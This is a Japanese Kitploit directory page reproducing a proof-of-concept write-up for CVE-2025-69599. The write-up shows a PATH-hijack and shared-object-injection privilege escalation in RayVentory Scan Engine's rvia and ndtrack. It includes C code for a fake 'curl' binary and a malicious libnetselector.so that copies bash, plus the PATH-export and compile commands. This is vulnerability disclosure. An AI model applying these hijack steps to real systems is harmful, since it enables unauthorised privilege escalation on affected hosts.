Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-69599 — 概念実証エクスプロイト - CVE-2025-69599:RayVentory Scan Engineにおける制御不能な検索パス要素を、PATHハイジャックと共有オブジェクトインジェクションを介して特権昇格へと悪用する実証コード。 | Kitploit
ツール/GitHubGitHub/wise-security/cve-2025-69599
特権昇格脆弱性分析エクスプロイトペネトレーションテストバイナリ解析サプライチェーンセキュリティ
GitHubwise-security/cve-2025-69599

CVE-2025-69599

概念実証エクスプロイト - CVE-2025-69599:RayVentory Scan Engineにおける制御不能な検索パス要素を、PATHハイジャックと共有オブジェクトインジェクションを介して特権昇格へと悪用する実証コード。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-69599

  • 著者: Rafael José Núñez Gulías
  • 会社: Iberian Var Group
  • 影響を受ける製品: RayVentory Scan Engine 12.6 Update 8 およびそれ以前のバージョン
  • Raynet 勧告: RSEC200965

Raynet の rvia は、制御されていない検索パス要素の問題に対して脆弱です。共有オブジェクトをロードし、システムバイナリ(.so やヘルパーバイナリなど)を呼び出す際に相対パスが使用されるため、ユーザーが PATH 環境変数の操作を通じて実行される最終的なバイナリや .so オブジェクトを改ざんすることが可能です。

20251117223200.png

次の証拠では、/tmp ディレクトリに curl という任意のバイナリが作成されています。

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # バイナリのコンパイル

PATH 変数が変更され、rvia によって curl コマンドが呼び出されたときに最初に検索されるディレクトリが /tmp になります。

root@kitploit:~
export PATH=/tmp:$PATH

その後、/opt/rvia/rvia getconfig を呼び出すと、改ざんされた curl バイナリが使用されます。

20251209121335.png

同様の問題は upload オプションにも適用されます。

20251209121709.png

同じ問題は、rvia inventory オプションを使用した場合にも見られます。このオプションは内部で ndtrack バイナリを呼び出します。ndtrack バイナリは、cat および sh コマンドを相対パスで呼び出します。

20251117223833.png

20251224134109.png

最後に、ndtrack バイナリが相対パスを使用して共有オブジェクト .so ファイル を取り込んでいることも検出されました。

20251118093146.png

次の証拠では、libnetselector.so への相対呼び出しを置き換える手順を示しています(libuploader.so でも同様の操作が可能です)。この場合、カスタム共有オブジェクトが作成され、この共有オブジェクトが実行されると、/tmp ディレクトリに bash_so_hijack として bash のコピーが作成されます。

以下は、libnetselector.so というカスタム共有オブジェクトを作成するための C コードです。

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # 共有オブジェクトのコンパイル

20251209131403.png

重要な注意点として、これは ndtrack を直接呼び出した場合にのみ機能します。inventory オプションが呼び出された場合、/opt/rvia にある ndtrack という bash スクリプトが呼び出され、そのスクリプトが ndtrack バイナリを呼び出す前に PATH 環境変数を設定するためです。

20251223190146.png

ツールをダウンロード